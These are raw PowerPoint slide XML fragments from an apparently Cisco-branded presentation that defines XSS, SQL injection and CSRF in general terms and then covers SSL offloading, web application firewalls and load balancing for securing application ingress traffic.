            <a:r>
              <a:rPr lang="en-IN" sz="1800" b="1" dirty="0"/>
              <a:t>Reflected</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0"/>
              <a:t> - attacks that are reflected take some other route to the victim (through an e-mail message, or bounced off from some other server) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" b="1" dirty="0"/>
              <a:t>DOM injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0"/>
              <a:t> – Injected code manipulates sites </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0" err="1"/>
              <a:t>javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0"/>
              <a:t> code or variables, rather than HTML objects. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="344685" indent="-342900"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="304800" y="103754"/>
            <a:ext cx="8345488" cy="731837"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>Categories of XSS Attacks</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3ECBEBDA-7CAC-4FA1-ACCF-5CBECCD0B80F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2057400" y="1703670"/>
            <a:ext cx="4359729" cy="1968910"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="9586959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5443" y="171449"/>
            <a:ext cx="8434845" cy="2324101"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-IN" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="57148" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-IN" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0"/>
              <a:t>Injection flaws, particularly SQL injection, are common in web applications. Injection occurs when user-supplied data is sent to an interpreter as part of a command or query. The attacker’s hostile data tricks the interpreter into executing unintended commands or changing data. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="57148" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="57148" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="57148" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="57148" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="344685" indent="-342900"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="304800" y="103754"/>
            <a:ext cx="8345488" cy="731837"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>SQL Injection</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B30E0F2F-DEA2-440C-884E-1AC9408A8D99}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1941109" y="2343150"/>
            <a:ext cx="4983511" cy="2276537"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1223856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5443" y="171449"/>
            <a:ext cx="8434845" cy="2324101"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-IN" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="57148" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-IN" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1300" dirty="0"/>
              <a:t>A CSRF attack forces a logged-on victim’s browser to send a pre-authenticated request to a vulnerable web application, which then forces the victim’s browser to perform a hostile action to the benefit of the attacker. CSRF can be as powerful as the web application that it attacks. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" sz="1300" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" sz="1300" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" sz="1300" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" sz="1300" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" sz="1300" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="57148" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-IN" sz="1300" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1300" dirty="0"/>
              <a:t>Applications are vulnerable if any of following: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-IN" sz="1300" dirty="0"/>
              <a:t>Does not re-verify authorization of action </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-IN" sz="1300" dirty="0"/>
              <a:t>Default login/password will authorize action </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-IN" sz="1300" dirty="0"/>
              <a:t>Action will be authorized based only on credentials which are automatically submitted by the browser such as session cookie, Kerberos token, basic authentication, or SSL certificate etc. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="57148" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="57148" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="57148" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="57148" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="344685" indent="-342900"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="304800" y="103754"/>
            <a:ext cx="8345488" cy="731837"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>Cross Site Request Forgery (CSRF)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3925A30B-7D67-47B2-BAF6-F7AD3AF8E4D9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2209800" y="1642769"/>
            <a:ext cx="4343400" cy="2010364"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3067709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EF665-0935-42E1-9339-85CB3664B3C1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="239408"/>
            <a:ext cx="7598042" cy="1265541"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-IN" sz="4000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Securing and Scaling Application Ingress Traffic</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="4000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:cs typeface="CiscoSansTT ExtraLight"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D6107D26-D4A2-490F-BDE9-401E7F1EF2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294" y="213670"/>
            <a:ext cx="941388" cy="585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0A95B869-A19A-499A-84CC-05CD9768F679}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="511442" y="1809750"/>
            <a:ext cx="7696200" cy="3139321"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:cs typeface="CiscoSansTT Thin" charset="0"/>
              </a:rPr>
              <a:t>Increasing Ingress Traffic! Applications needs to stay available 24x7</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:cs typeface="CiscoSansTT Thin" charset="0"/>
              </a:rPr>
              <a:t>Scale up – Add more servers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:cs typeface="CiscoSansTT Thin" charset="0"/>
              </a:rPr>
              <a:t>What else can I do? Plan Ahead!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:cs typeface="CiscoSansTT Thin" charset="0"/>
              </a:rPr>
              <a:t>SSL Offloading</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:cs typeface="CiscoSansTT Thin" charset="0"/>
              </a:rPr>
              <a:t>Web-Application Firewall</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" dirty="0">
                <a:cs typeface="CiscoSansTT Thin" charset="0"/>
              </a:rPr>
              <a:t>Reverse Proxy Scrubbing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" dirty="0">
                <a:cs typeface="CiscoSansTT Thin" charset="0"/>
              </a:rPr>
              <a:t>Load Balancing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" dirty="0">
                <a:cs typeface="CiscoSansTT Thin" charset="0"/>
              </a:rPr>
              <a:t>Securing and Scaling DNS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:cs typeface="CiscoSansTT Thin" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:cs typeface="CiscoSansTT Thin"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srgbClr val="282828"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="CiscoSansTT ExtraLight"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="340795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5443" y="171449"/>
            <a:ext cx="8434845" cy="495301"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-IN" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="57148" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-IN" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="57148" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-IN" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="57148" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-IN" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="57148" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-IN" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="57148" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-IN" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" dirty="0"/>
              <a:t>Process of removing the SSL-based encryption from incoming traffic to relieve a web server of the processing burden of decrypting and/or encrypting traffic sent via SSL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" dirty="0"/>
              <a:t>Two Methods:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" b="1" dirty="0"/>
              <a:t>SSL termination</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" dirty="0"/>
              <a:t>: Decrypt the connection at LB &amp; forward the request to server over http</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" b="1" dirty="0"/>
              <a:t>SSL bridging</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" dirty="0"/>
              <a:t>: Re-encrypts the traffic (majorly meant to increase security as LB can validate the incoming data against malicious code)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" sz="1300" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="57148" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-IN" sz="1300" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" sz="1300" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="57148" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-IN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="57148" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="57148" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="57148" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="57148" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="344685" indent="-342900"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="304800" y="103754"/>
            <a:ext cx="8345488" cy="731837"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>Secure Socket Layer (SSL) Offloading</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Content Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8C0550DF-0D27-4A33-9E6F-E896CBB73CEB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1295401" y="839674"/>
            <a:ext cx="2209800" cy="1754171"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1D76888D-FC1E-4110-B34E-B21200BAB806}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4876800" y="836009"/>
            <a:ext cx="2193663" cy="1754172"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="7074355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5443" y="171449"/>
            <a:ext cx="8434845" cy="495301"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-IN" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="57148" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-IN" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="57148" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-IN" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="57148" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-IN" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="57148" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-IN" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="57148" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-IN" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" sz="1300" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="57148" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-IN" sz="1300" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" sz="1300" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="57148" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-IN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="57148" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="57148" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="57148" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="57148" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="344685" indent="-342900"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="304800" y="103754"/>
            <a:ext cx="8345488" cy="731837"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Web Application Firewall</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{40490D4A-E572-4CE9-B6E5-3025B495C781}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="246590" y="1047750"/>
            <a:ext cx="5925610" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Knows how protocol works. E.g. HTTP, FTP </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Aware of Application behavior in brief. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Operate on L4-L7</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C23891F3-2F41-4DF4-BA75-725354ECABAB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1935896" y="2114550"/>
            <a:ext cx="5083295" cy="2569575"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
